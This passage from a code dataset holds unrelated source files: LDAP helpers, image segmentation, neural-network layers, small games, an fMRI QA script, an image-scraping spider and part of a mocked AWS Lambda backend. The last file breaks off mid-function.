If username is None, it tries to connect using user provided credentials.\n @param username: Username for connection validation\n @param password: Password for connection validation\n @return: Connection established\n @raise exception: If connection could not be established\n \"\"\"\n logger.debug('Login in to %s as user %s', host, username)\n l = None\n password = passwd.encode('utf-8') if isinstance(passwd, str) else passwd\n\n try:\n if debug:\n ldap.set_option(ldap.OPT_DEBUG_LEVEL, 8191) # type: ignore\n\n schema = 'ldaps' if ssl else 'ldap'\n if port == -1:\n port = 636 if ssl else 389\n uri = \"{}://{}:{}\".format(schema, host, port)\n logger.debug('Ldap uri: %s', uri)\n\n l = ldap.initialize(uri=uri) # type: ignore\n l.set_option(ldap.OPT_REFERRALS, 0) # type: ignore\n l.set_option(ldap.OPT_TIMEOUT, int(timeout)) # type: ignore\n l.network_timeout = int(timeout)\n l.protocol_version = ldap.VERSION3 # type: ignore\n\n certificate = (certificate or '').strip()\n\n if ssl:\n if certificate and verify_ssl: # If not verify_ssl, we don't need the certificate\n # Create a semi-temporary ca file, with the content of the certificate\n # The name is from the host, so we can ovwerwrite it if needed\n cert_filename = os.path.join(tempfile.gettempdir(), f'ldap-cert-{host}.pem')\n with open(cert_filename, 'w') as f:\n f.write(certificate)\n l.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_filename) # type: ignore\n\n if not verify_ssl:\n l.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER) # type: ignore\n # Disable TLS1 and TLS1.1\n # 0x304 = TLS1.3, 0x303 = TLS1.2, 0x302 = TLS1.1, 0x301 = TLS1.0, but use ldap module constants\n l.set_option(ldap.OPT_X_TLS_PROTOCOL_MIN, ldap.OPT_X_TLS_PROTOCOL_TLS1_2) # type: ignore\n\n l.set_option(ldap.OPT_X_TLS_NEWCTX, 0) # type: ignore\n \n l.simple_bind_s(who=username, cred=password)\n except ldap.SERVER_DOWN as e: # type: ignore\n raise LDAPError(_('Can\\'t contact LDAP server') + ': {}'.format(e))\n except ldap.LDAPError as e: # type: ignore\n LDAPError.reraise(e)\n except Exception as e:\n logger.exception('Exception connection:')\n raise LDAPError('{}'.format(e))\n\n logger.debug('Connection was successful')\n return l\n\n\ndef getAsDict(\n con: typing.Any,\n base: str,\n ldapFilter: str,\n attrList: typing.Optional[typing.Iterable[str]]=None,\n sizeLimit: int=100,\n scope=SCOPE_SUBTREE,\n) -> typing.Generator[LDAPResultType, None, None]:\n \"\"\"\n Makes a search on LDAP, adjusting string to required type (ascii on python2, str on python3).\n returns an generator with the results, where each result is a dictionary where it values are always a list of strings\n \"\"\"\n logger.debug('Filter: %s, attr list: %s', ldapFilter, attrList)\n\n if attrList:\n attrList = [i for i in attrList] # Ensures iterable is a list\n\n res = None\n try:\n # On python2, attrs and search string is str (not unicode), in 3, str (not bytes)\n res = con.search_ext_s(\n base,\n scope=scope,\n filterstr=ldapFilter,\n attrlist=attrList,\n sizelimit=sizeLimit,\n )\n except ldap.LDAPError as e: # type: ignore\n LDAPError.reraise(e)\n except Exception as e:\n logger.exception('Exception connection:')\n raise LDAPError('{}'.format(e))\n\n logger.debug('Result of search %s on %s: %s', ldapFilter, base, res)\n\n if res is not None:\n for r in res:\n if r[0] is None:\n continue # Skip None entities\n\n # Convert back attritutes to test_type ONLY on python2\n dct = (\n tools.CaseInsensitiveDict((k, ['']) for k in attrList)\n if attrList is not None\n else 
tools.CaseInsensitiveDict()\n )\n\n # Convert back result fields to str\n for k, v in r[1].items():\n dct[k] = list(i.decode('utf8', errors='replace') for i in v)\n\n dct.update({'dn': r[0]})\n\n yield dct\n\n\ndef getFirst(\n con: typing.Any,\n base: str,\n objectClass: str,\n field: str,\n value: str,\n attributes: typing.Optional[typing.Iterable[str]] = None,\n sizeLimit: int = 50,\n) -> typing.Optional[LDAPResultType]:\n \"\"\"\n Searchs for the username and returns its LDAP entry\n @param username: username to search, using user provided parameters at configuration to map search entries.\n @param objectClass: Objectclass of the user mane username to search.\n @return: None if username is not found, an dictionary of LDAP entry attributes if found (all in unicode on py2, str on py3).\n \"\"\"\n value = ldap.filter.escape_filter_chars(value)\n\n attrList = [field] + [i for i in attributes] if attributes else []\n\n ldapFilter = '(&(objectClass={})({}={}))'.format(objectClass, field, value)\n\n try:\n obj = next(getAsDict(con, base, ldapFilter, attrList, sizeLimit))\n except StopIteration:\n return None # None found\n\n obj['_id'] = value\n\n return obj\n\n\n# Recursive delete\ndef recursive_delete(con: typing.Any, base_dn: str) -> None:\n search = con.search_s(base_dn, SCOPE_ONELEVEL) # type: ignore\n\n for dn, _ in search:\n # recursive_delete(conn, dn)\n # RIGHT NOW IS NOT RECURSIVE, JUST 1 LEVEL BELOW!!!\n con.delete_s(dn)\n\n con.delete_s(base_dn)\n\n\ndef getRootDSE(con: typing.Any) -> typing.Optional[LDAPResultType]:\n \"\"\"\n Gets the root DSE of the LDAP server\n @param cont: Connection to LDAP server\n @return: None if root DSE is not found, an dictionary of LDAP entry attributes if found (all in unicode on py2, str on py3).\n \"\"\"\n return next(getAsDict(\n con=con,\n base='',\n ldapFilter='(objectClass=*)',\n scope=SCOPE_BASE,\n ))\n","sub_path":"server/src/uds/core/util/ldaputil.py","file_name":"ldaputil.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"320657144","text":"import cv2\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\n\nfrom recognition.main import predict\nfrom recognition.preprocess import thresh, apply_mask, prop_resize_cv\n\n\ndef segmentation(img):\n # TODO: Рассчёт значений EPS и MIN SAMPLES для каждого изображения\n # TODO: Деформация изображения для повторной кластеризации?\n mask = thresh(img)\n masked = apply_mask(img, mask)\n\n # Кластеризация\n X = []\n h, w = mask.shape\n for i in range(h):\n for j in range(w):\n if mask[i, j] == 0:\n X.append([i, j, masked[i, j, 0], masked[i, j, 1], masked[i, j, 2]])\n X = np.array(X)\n\n labels = DBSCAN(eps=17, min_samples=13).fit_predict(X)\n\n # Убрать шум\n Y = []\n new_labels = []\n for k, x in enumerate(X):\n if labels[k] >= 0:\n new_labels.append(labels[k])\n Y.append(x)\n\n new_labels = np.array(new_labels)\n Y = np.array(Y)\n\n # Выделение сегментов\n segments_d = {}\n for k, l in enumerate(new_labels):\n if l not in segments_d:\n segments_d[l] = []\n segments_d[l].append([Y[k, 0], Y[k, 1]])\n\n # Рассчёт центров\n centroids = []\n for k in segments_d:\n centroids.append(np.sum(segments_d[k], axis=0) // len(segments_d[k]))\n centroids = np.array(centroids)\n\n # Повторная кластеризация\n labels = DBSCAN(eps=35, min_samples=1).fit_predict(np.array([[x[0] * 3, x[1] / 2] for x in centroids]))\n\n # Убрать шум\n Y = []\n new_labels = []\n for k, x in enumerate(centroids):\n if labels[k] >= 0:\n 
new_labels.append(labels[k])\n Y.append(x)\n\n Y = np.array(Y)\n\n # Сегментация\n new_segments_d = {}\n for k, x in enumerate(segments_d):\n if labels[k] not in new_segments_d:\n new_segments_d[labels[k]] = segments_d[x]\n else:\n new_segments_d[labels[k]] = np.append(new_segments_d[labels[k]], segments_d[x], axis=0)\n\n segments = []\n for k in new_segments_d:\n x = np.array(new_segments_d[k])\n off_y, off_x = (min(x[:, 0]), min(x[:, 1]))\n h, w = (max(x[:, 0]) - off_y + 1, max(x[:, 1]) - off_x + 1)\n seg = np.empty((h, w), dtype='uint8')\n seg.fill(255)\n for el in x:\n seg[el[0] - off_y, el[1] - off_x] = 0\n segments.append((seg, ((off_x, off_y), (w + off_x, h + off_y)), (w, h)))\n\n print('Segments: {}'.format(len(segments)))\n\n return np.array(segments)\n\n\nif __name__ == '__main__':\n img = cv2.imread('../data/boards/cut/IMG_20190218_170650.jpg')\n img = prop_resize_cv(img, (1280, 720))\n\n cv2.imshow('img', thresh(img))\n cv2.waitKey()\n cv2.destroyAllWindows()\n\n segments = segmentation(img)\n new = img.copy()\n for s in segments:\n c = [int(np.random.random() * 255) for k in range(3)]\n col = np.full((s[2][1], s[2][0], 3), c)\n col = cv2.bitwise_and(col, col, mask=(255 - s[0]))\n new[s[1][0][1]:s[1][1][1], s[1][0][0]:s[1][1][0]] = col\n\n cv2.imshow('img', new)\n cv2.waitKey()\n cv2.destroyAllWindows()","sub_path":"recognition/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"652486507","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\n\nfrom django.conf import settings\n\n_logger = logging.getLogger()\n\n\ndef get_manifest_data(filename):\n try:\n with open(filename) as f:\n return json.load(f)\n except AttributeError:\n _logger.error('Please add the path to manifest.json file.')\n except IOError:\n _logger.error('Please provide proper manifest filename ({})'\n .format(filename))\n\n\ndef get_manifest():\n reload_manifest = getattr(settings, 'RELOAD_MANIFEST', False)\n if not hasattr(settings, 'STATIC_MANIFEST') or reload_manifest:\n manifest = get_manifest_data(settings.MANIFEST_FILENAME)\n setattr(settings, 'STATIC_MANIFEST', manifest)\n return settings.STATIC_MANIFEST\n\n\ndef _get_chunk_with_suffix(chunkname, suffix):\n manifest = get_manifest()\n assets = manifest['assetsByChunkName'][chunkname]\n if isinstance(assets, basestring):\n assets = [assets]\n for a in filter(lambda s: s.endswith(suffix), assets):\n yield a\n\n\ndef get_js_from_chunk(chunkname):\n return \" \".join([''.format(s)\n for s in _get_chunk_with_suffix(chunkname, '.js')])\n\n\ndef get_css_from_chunk(chunkname):\n return \" \".join([''.format(c)\n for c in _get_chunk_with_suffix(chunkname, '.css')])\n","sub_path":"src/face_full/utils/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"119767060","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/pesummary/cli/summarydetchar.py\n# Compiled at: 2020-04-21 06:57:35\n# Size of source mod 2**32: 4814 bytes\nimport os, pesummary\nfrom pesummary.gw.file.read import read\nfrom pesummary.gw.plots import detchar\nfrom pesummary.utils.exceptions import InputError\nfrom pesummary.utils.utils import make_dir, logger\nfrom 
pesummary.core.command_line import DictionaryAction\nimport matplotlib.pyplot as plt, argparse\n__doc__ = 'This executable is used to generate plots associated with the\\ndetectors'\n\ndef command_line():\n \"\"\"Generate an Argument Parser object to control the command line options\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-w', '--webdir', dest='webdir', help='make page and plots in DIR',\n metavar='DIR',\n default=None)\n parser.add_argument('-s', '--samples', dest='samples', help='Posterior samples hdf5 file',\n nargs='+',\n default=None)\n parser.add_argument('--gwdata', dest='gwdata', help='channels and paths to strain cache files',\n action=DictionaryAction,\n metavar='CHANNEL:CACHEFILE',\n nargs='+',\n default=None)\n parser.add_argument('--plot', dest='plot', help='name of the publication plot you wish to produce',\n default='2d_contour',\n choices=[\n 'spectrogram', 'omegascan'])\n parser.add_argument('--gps', dest='gps', default=None, help='GPS time to centre the omegascan around')\n parser.add_argument('--vmin', dest='vmin', default=0, help='minimum for the omegascan colormap')\n parser.add_argument('--vmax', dest='vmax', default=0, help='maximum for the omegascan colormap')\n parser.add_argument('--window', dest='window', default=4, help='window around gps time to generate omegascan for')\n return parser\n\n\ndef get_maxL_time(samples):\n \"\"\"Return the maxL time stored in the samples\n\n Parameters\n ----------\n samples: str\n path to a samples file\n \"\"\"\n f = read(samples)\n samples_dict = f.samples_dict\n return samples_dict['geocent_time'].maxL\n\n\ndef read_strain(dictionary):\n \"\"\"Read the gwdata strain and return a gwpy.timeseries.TimeSeries object\n\n Parameters\n ----------\n dictionary: dict\n dictionary of channels and cache files\n \"\"\"\n from pesummary.gw.file.formats.base_read import GWRead\n for i in dictionary.keys():\n if not os.path.isfile(dictionary[i]):\n raise InputError('The file {} does not exist. Please check the path to your strain file'.format(dictionary[i]))\n\n timeseries = GWRead.load_strain_data(dictionary)\n return timeseries\n\n\ndef make_spectrogram_plot(opts):\n \"\"\"Make a spectrogram plot\n \"\"\"\n gwdata = read_strain(opts.gwdata)\n figs = detchar.spectrogram(gwdata)\n for det, fig in figs.items():\n fig.savefig(os.path.join(opts.webdir, 'spectrogram_{}.png'.format(det)))\n plt.close()\n\n\ndef make_omegascan_plot(opts):\n \"\"\"Make an omegascan plot. 
If gps is None, centre around maxL from samples\n \"\"\"\n if opts.gps is None:\n opts.gps = get_maxL_time(opts.samples[0])\n gwdata = read_strain(opts.gwdata)\n figs = detchar.omegascan(gwdata,\n (float(opts.gps)), window=(float(opts.window)), vmin=(float(opts.vmin)),\n vmax=(float(opts.vmax)))\n for det, fig in figs.items():\n fig.savefig(os.path.join(opts.webdir, 'omegascan_{}.png'.format(det)))\n plt.close()\n\n\ndef main(args=None):\n \"\"\"Top level interface for `summarydetchar`\n \"\"\"\n parser = command_line()\n opts = parser.parse_args(args=args)\n make_dir(opts.webdir)\n func_map = {'spectrogram':make_spectrogram_plot, 'omegascan':make_omegascan_plot}\n func_map[opts.plot](opts)","sub_path":"pycfiles/pesummary-0.5.4-py3.6/summarydetchar.cpython-36.py","file_name":"summarydetchar.cpython-36.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"609204900","text":"def longest_subseq():\r\n # Прочитаем исходные данные из консоли\r\n n = int(input())\r\n x = [int(i) for i in input().split(' ')]\r\n P = [0]*n\r\n M = [0]*(n + 1)\r\n L = 0\r\n x = x[::-1]\r\n for i in range(n):\r\n lo = 1\r\n hi = L\r\n while lo <= hi:\r\n mid = (lo + hi) // 2\r\n if x[M[mid]] < x[i]:\r\n lo = mid + 1\r\n elif x[M[mid]] == x[i]:\r\n lo += 1\r\n else:\r\n hi = mid - 1\r\n newL = lo\r\n P[i] = M[newL - 1]\r\n if newL > L:\r\n M[newL] = i\r\n L = newL\r\n elif x[i] < x[M[newL]]:\r\n M[newL] = i\r\n \r\n # Восстановим решение по рассчитанным данным\r\n re = [0]*L\r\n k = M[L]\r\n for i in range(L-1, -1, -1):\r\n re[i] = n - k\r\n k = P[k]\r\n print(len(re))\r\n print(' '.join(map(str,re[::-1])))\r\n\r\nif __name__ == \"__main__\":\r\n longest_subseq()\r\n","sub_path":"8.2.2.py","file_name":"8.2.2.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"311476398","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nfrom .views import (\n account_view,\n signup_view,\n login_view,\n logout_view\n)\n\napp_name = 'accounts'\n\n\nurlpatterns = [\n path('account/', account_view),\n path('signup/', signup_view, name=\"signup\"),\n path('login/', login_view, name=\"login\"),\n path('logout/', logout_view, name=\"logout\"),\n\n\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"382520755","text":"\"Library of Layers\"\n\nimport copy\nfrom common.np import * # import numpy as np\n\nclass Sigmoid:\n \"Sigmoid Layer. y = 1 / (1 + exp(-x))\"\n def __init__(self):\n self.params, self.grads = {}, {}\n self.out = None # 順伝播の出力\n def forward(self, x):\n self.out = 1.0 / (1.0 + np.exp(-x))\n return self.out\n def backward(self, dout):\n dx = dout * self.out * (1 - self.out) # dy/dx = y(1-y). xへの逆伝播は dL/dy*dy/dx. 
ここでdL/dyがdout.\n        return dx\n\n\nclass Affine:\n    \"\"\"\n    Fully connected layer: y = xW + b\n    W : Weight (Rows: the number of input nodes, Cols: the number of output nodes)\n    x : input data (Rows: the number of data, Cols: the number of input nodes)\n    b : bias (Rows: 1, Cols: the number of output nodes)\n    y : output (Rows: the number of data, Cols: the number of output nodes)\n    \"\"\"\n    def __init__(self, W, b):\n        self.params = {\"W\": W, \"b\": b}\n        self.grads = {\"W\": np.zeros_like(W), \"b\": np.zeros_like(b)}\n        self.x = None\n    def forward(self, x):\n        \"y = x.W + b\"\n        self.x = x\n        return np.dot(x, self.params[\"W\"]) + self.params[\"b\"]\n    def backward(self, dout):\n        \"\"\"\n        Parameters\n        --------\n        dout : ndarray\n            dL/dy matrix (Rows: the number of data, Cols: the number of output nodes)\n        --------\n        \"\"\"\n        dx = np.dot(dout, self.params[\"W\"].T) # dL/dy . W^T\n        dW = np.dot(self.x.T, dout) # x^T . dL/dy\n        db = np.sum(dout, axis=0) # sum the rows of dL/dy into a single row\n        self.grads[\"W\"] = dW.copy()\n        self.grads[\"b\"] = db.copy()\n        return dx\n\nclass SoftmaxWithLoss:\n    def __init__(self):\n        self.params, self.grads = {}, {}\n        self.t = None # Teacher Data\n        self.y = None # Output Data\n    def forward(self, x, t):\n        self.y = softmax(x)\n        self.t = t\n        # If the teacher labels are one-hot vectors, convert them to class indices\n        if self.t.size == self.y.size:\n            self.t = self.t.argmax(axis=1) # argmax returns the index of the largest value\n        loss = cross_entropy(self.y, self.t)\n        return loss\n    def backward(self, dout=1):\n        batch_size = self.t.shape[0]\n        dx = self.y.copy()\n        dx[np.arange(batch_size), self.t] -= 1\n        dx *= dout\n        dx = dx / batch_size\n        return dx\n\ndef softmax(x):\n    \"\"\"\n    Row-wise softmax; each row of x is one sample\n    Parameters\n    --------\n    x : ndarray\n        matrix (Rows: the number of data, Cols: dimension of x)\n    --------\n    \"\"\"\n    expx = np.exp(x)\n    return expx / np.sum(expx, axis=1).reshape(-1, 1) # reshape(-1, 1) instead of a hard-coded batch size\n\ndef cross_entropy(y, t):\n    \"交差エントロピー誤差. 
yは出力値、tは教師データ\"\n #return -np.sum(t * np.log(y))\n loss = 0\n for i, t_idx in enumerate(t):\n loss += -np.log(y[i][t_idx])\n return loss\n","sub_path":"common/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"116497893","text":"\"\"\"\nCreating a representation of cards and evaluating hand strengths\n\"\"\"\nfrom itertools import product as prod\ncardValues = {'J': 11, 'Q': 12, 'K': 13, 'A': 14}\nfor i in range(10):\n cardValues[str(i)] = i\nvalueNames = {'J': 'Jack', 'Q': 'Queen', 'K': 'King', 'A': 'Ace'}\nfullSuits = {'C': 'Clubs', 'H': 'Hearts', 'S': 'Spades', 'D': 'Diamonds'}\n\n\nclass Card:\n def __init__(self, suit, value):\n self.suit = suit\n self.value = value\n if value.isdigit():\n self.num = value\n self.picture = False\n else:\n self.num = cardValues[value]\n self.picture = True\n\n def __str__(self):\n if self.picture:\n return f\"{valueNames[self.value]} of {fullSuits[self.suit]}\"\n else:\n return f\"{self.value} of {fullSuits[self.suit]}\"\n\n def __repr__(self):\n return f\"{self.value} {self.suit}\"\n\n def __le__(self, other):\n return self.value <= other.value\n\n\nprint(list(prod(fullSuits.keys(), cardValues.keys())))\n\n\n\n","sub_path":"Old Code/PokerBot.py","file_name":"PokerBot.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"478244889","text":"# -*- coding: utf-8 -*-\nimport random\nfrom Tkinter import *\nimport tkMessageBox\n\nclass Person:\n def __init__(self, uuid, name):\n self.uuid = uuid\n self.name = name\n \nclass Table:\n def __init__(self, uuid, name, persons):\n self.uuid = uuid\n self.name = name\n self.persons = persons\n \ndef main():\n persons = []\n\n f = open(\"personer.txt\", \"r\")\n for x in f:\n uuid = 1\n uuid += 1\n persons.append(Person(uuid, x.strip()))\n f.close()\n\n tasks = []\n f = open('oppgaver.txt', \"r\")\n for x in f:\n tasks.append(x.strip())\n f.close()\n\n\n tableOne = Table(\"001\", \"table 1\", [persons.pop(), persons.pop(), persons.pop()])\n\n tableTwo = Table(\"002\", \"table 2\", [persons.pop(), persons.pop(), persons.pop()])\n\n \n\n tables = [tableOne, tableTwo]\n\n top = Tk()\n def personCallBack():\n table = random.choice(tables)\n task = random.choice(tasks)\n personObj = random.choice(table.persons)\n person = personObj.name\n var.set(person + \" fra \" + table.name + \" skal \" + task)\n\n def tableCallBack():\n table = random.choice(tables)\n task = random.choice(tasks)\n var.set(\"alle fra \" + table.name + \" skal \" + task)\n \n B = Button(top, text =\"Bord\", command = tableCallBack)\n A = Button(top, text =\"Person\", command = personCallBack)\n var = StringVar()\n label = Label( top, textvariable=var, relief=RAISED )\n var.set(\"Velkommen til TableSelector.py verdens kuleste spill \\n for å spille trengs to filer personer.txt og oppgaver.txt i samme mappe som scriptet\")\n label.pack()\n A.pack()\n B.pack()\n\n top.mainloop()\n\n\n\n# while(text != \"end\"): \n# person = \"alle\"\n# table = random.choice(tables)\n# task = random.choice(tasks)\n# if text == \"person\":\n# personObj = random.choice(table.persons)\n# person = personObj.name\n# print(person + \" fra \" + table.name + \" skal \" + task)\n# text = raw_input(\"Skal oppgaven løses av en person eller et helt bord?\\n\")\n\n \nif __name__ == '__main__':\n 
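    # Note: in main() above, `uuid = 1` is re-initialised on every loop
    # iteration, so every Person is constructed with uuid == 2. A
    # likely-intended variant (a sketch, assuming sequential ids were meant):
    #     uuid = 0
    #     for x in f:
    #         uuid += 1
    #         persons.append(Person(uuid, x.strip()))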
main()","sub_path":"TableSelector.py","file_name":"TableSelector.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"294779750","text":"\"\"\"Preprocess QA.\"\"\"\nfrom os.path import join as opj\nfrom glob import glob\nimport os\n\n'''\nSpecify global variables\n'''\n# Specify directory\nbase_dir = '/seastor/zhifang/ds002'\nderiv_dir = opj(base_dir, 'derivatives')\n# Subject list\nsubject_list = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10',\n '11', '12', '13', '14', '15', '16', '17', '18', '19', '20',\n '21', '22']\n# QA file\nout_file = opj(deriv_dir, 'qa', 'lv1_qa.html')\n# Get feat dir\nenc_list = sorted(glob(opj(deriv_dir, 'sub-*', 'func',\n 'preprocess_encoding_run-*_5mm.feat')))\nretr_list = sorted(glob(opj(deriv_dir, 'sub-*', 'func',\n 'preprocess_retrieval_run-*_5mm.feat')))\nloca_list = sorted(glob(opj(deriv_dir, 'sub-*', 'func',\n 'preprocess_localizer_run-*_5mm.feat')))\nfeat_list = enc_list + retr_list + loca_list\n\nf = open(out_file, 'w')\nfor file in list(feat_list):\n f.write(\"
============================================\")\n    f.write(\"%s\" % (file))\n    f.write(\"\" % (file))\n    f.write(\"\" % (file))\n    f.write(\"\" % (file))\n    f.write(\"\" % (file))\n    f.write(\"\" % (file))\n    f.write(\"\" % (file))\n    f.write(\"\" % (file))\n    f.write(\"
\" % (file))\nf.close()\n","sub_path":"code/p02_model06_qa-preprocess.py","file_name":"p02_model06_qa-preprocess.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111719256","text":"\"\"\"multithread spider\"\"\"\nimport queue\nimport threading\nimport time\nimport random\nfrom huiparse import deal_group_page\nfrom huiparse import download_work\n\n\n# max groups to traverse\nMAX_GROUPS_TO_TRAVERSE = 10\n# images to download : [(groupID1,[url1,url2,..])\nDOWNLOAD_QUEUE = queue.Queue()\n# groups to be traverse [(groupID1, url1), (groupID2, url2)...]\nTRAVERSE_QUEUE = queue.Queue()\n# groupID recorder to remember the groups that has been traversed\nGROUP_TRAVERSED = []\n# producer and consumer\nCONDITION = threading.Condition()\n# the start group page\nSTART_PAGE = \"http://www.361games.com/html/tu/486426.html\"\n\n\ndef filter_with_shared_list(condition, share_list, elements):\n \"\"\"\n filter the elements with shared list\n :param share_list : [groupID1, groupID2...]\n :param elements : [(groupID1, url1), (groupID2, url2)...]\n \"\"\"\n if condition.acquire():\n for item in elements:\n if item[0] in share_list:\n elements.remove(item)\n else:\n share_list.append(item[0])\n condition.notify()\n condition.release()\n\n\ndef group_page_process(start_page):\n \"\"\"the main proc tp process a new page\"\"\"\n print(\"CURRENTS: \", start_page)\n recommends, pics = deal_group_page(start_page)\n if len(pics) != 0:\n DOWNLOAD_QUEUE.put(pics)\n if TRAVERSE_QUEUE.qsize() < 3:\n filter_with_shared_list(CONDITION, GROUP_TRAVERSED, recommends)\n if len(recommends) != 0:\n TRAVERSE_QUEUE.put(recommends)\n\n\ndef producer(name):\n \"\"\"thread to parse the web page and generate the wanted contents\"\"\"\n while True:\n if DOWNLOAD_QUEUE.qsize() <= 10:\n next_groups = TRAVERSE_QUEUE.get()\n print('Producer %s:' % name)\n for item in next_groups:\n group_page_process(item[1])\n time.sleep(random.random())\n\n\ndef consumer(name):\n \"\"\"thread to do the downloading works\"\"\"\n while True:\n pics = DOWNLOAD_QUEUE.get()\n print('Consumer %s:' % name)\n download_work(pics)\n\n\n# the main function\nif __name__ == '__main__':\n group_page_process(START_PAGE)\n for i in range(1):\n p = threading.Thread(target=producer, args=('zhanghui',))\n p.start()\n\n for i in range(2):\n c = threading.Thread(target=consumer, args=('wenjing',))\n c.start()\n","sub_path":"ToutiaoPlus/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"583195448","text":"from __future__ import unicode_literals\n\nimport base64\nimport datetime\nimport hashlib\nimport io\nimport os\nimport json\nimport sys\nimport zipfile\n\ntry:\n from StringIO import StringIO\nexcept:\n from io import StringIO\n\nimport boto.awslambda\nfrom moto.core import BaseBackend, BaseModel\nfrom moto.s3.models import s3_backend\nfrom moto.s3.exceptions import MissingBucket, MissingKey\n\n\nclass LambdaFunction(BaseModel):\n\n def __init__(self, spec, validate_s3=True):\n # required\n self.code = spec['Code']\n self.function_name = spec['FunctionName']\n self.handler = spec['Handler']\n self.role = spec['Role']\n self.run_time = spec['Runtime']\n\n # optional\n self.description = spec.get('Description', '')\n self.memory_size = spec.get('MemorySize', 128)\n self.publish = spec.get('Publish', False) # this is ignored currently\n self.timeout = 
spec.get('Timeout', 3)\n\n # this isn't finished yet. it needs to find out the VpcId value\n self._vpc_config = spec.get(\n 'VpcConfig', {'SubnetIds': [], 'SecurityGroupIds': []})\n\n # auto-generated\n self.version = '$LATEST'\n self.last_modified = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')\n if 'ZipFile' in self.code:\n # more hackery to handle unicode/bytes/str in python3 and python2 -\n # argh!\n try:\n to_unzip_code = base64.b64decode(\n bytes(self.code['ZipFile'], 'utf-8'))\n except Exception:\n to_unzip_code = base64.b64decode(self.code['ZipFile'])\n\n zbuffer = io.BytesIO()\n zbuffer.write(to_unzip_code)\n zip_file = zipfile.ZipFile(zbuffer, 'r', zipfile.ZIP_DEFLATED)\n self.code = zip_file.read(\"\".join(zip_file.namelist()))\n self.code_size = len(to_unzip_code)\n self.code_sha_256 = hashlib.sha256(to_unzip_code).hexdigest()\n else:\n # validate s3 bucket and key\n key = None\n try:\n # FIXME: does not validate bucket region\n key = s3_backend.get_key(\n self.code['S3Bucket'], self.code['S3Key'])\n except MissingBucket:\n if do_validate_s3():\n raise ValueError(\n \"InvalidParameterValueException\",\n \"Error occurred while GetObject. S3 Error Code: NoSuchBucket. S3 Error Message: The specified bucket does not exist\")\n except MissingKey:\n if do_validate_s3():\n raise ValueError(\n \"InvalidParameterValueException\",\n \"Error occurred while GetObject. S3 Error Code: NoSuchKey. S3 Error Message: The specified key does not exist.\")\n if key:\n self.code_size = key.size\n self.code_sha_256 = hashlib.sha256(key.value).hexdigest()\n self.function_arn = 'arn:aws:lambda:123456789012:function:{0}'.format(\n self.function_name)\n\n self.tags = dict()\n\n @property\n def vpc_config(self):\n config = self._vpc_config.copy()\n if config['SecurityGroupIds']:\n config.update({\"VpcId\": \"vpc-123abc\"})\n return config\n\n def __repr__(self):\n return json.dumps(self.get_configuration())\n\n def get_configuration(self):\n return {\n \"CodeSha256\": self.code_sha_256,\n \"CodeSize\": self.code_size,\n \"Description\": self.description,\n \"FunctionArn\": self.function_arn,\n \"FunctionName\": self.function_name,\n \"Handler\": self.handler,\n \"LastModified\": self.last_modified,\n \"MemorySize\": self.memory_size,\n \"Role\": self.role,\n \"Runtime\": self.run_time,\n \"Timeout\": self.timeout,\n \"Version\": self.version,\n \"VpcConfig\": self.vpc_config,\n }\n\n def get_code(self):\n if isinstance(self.code, dict):\n return {\n \"Code\": {\n \"Location\": \"s3://lambda-functions.aws.amazon.com/{0}\".format(self.code['S3Key']),\n \"RepositoryType\": \"S3\"\n },\n \"Configuration\": self.get_configuration(),\n }\n else:\n return {\n \"Configuration\": self.get_configuration(),\n }\n\n def convert(self, s):\n try:\n return str(s, encoding='utf-8')\n except:\n return s\n\n def is_json(self, test_str):\n try:\n response = json.loads(test_str)\n except:\n response = test_str\n return response\n\n def _invoke_lambda(self, code, event={}, context={}):\n # TO DO: context not yet implemented\n try:\n mycode = \"\\n\".join(['import json',\n self.convert(self.code),\n self.convert('print(json.dumps(lambda_handler(%s, %s)))' % (self.is_json(self.convert(event)), context))])\n\n except Exception as ex:\n print(\"Exception %s\", ex)\n\n errored = False\n try:\n original_stdout = sys.stdout\n original_stderr = sys.stderr\n codeOut = StringIO()\n codeErr = StringIO()\n sys.stdout = codeOut\n sys.stderr = codeErr\n exec(mycode)\n exec_err = codeErr.getvalue()\n exec_out = 
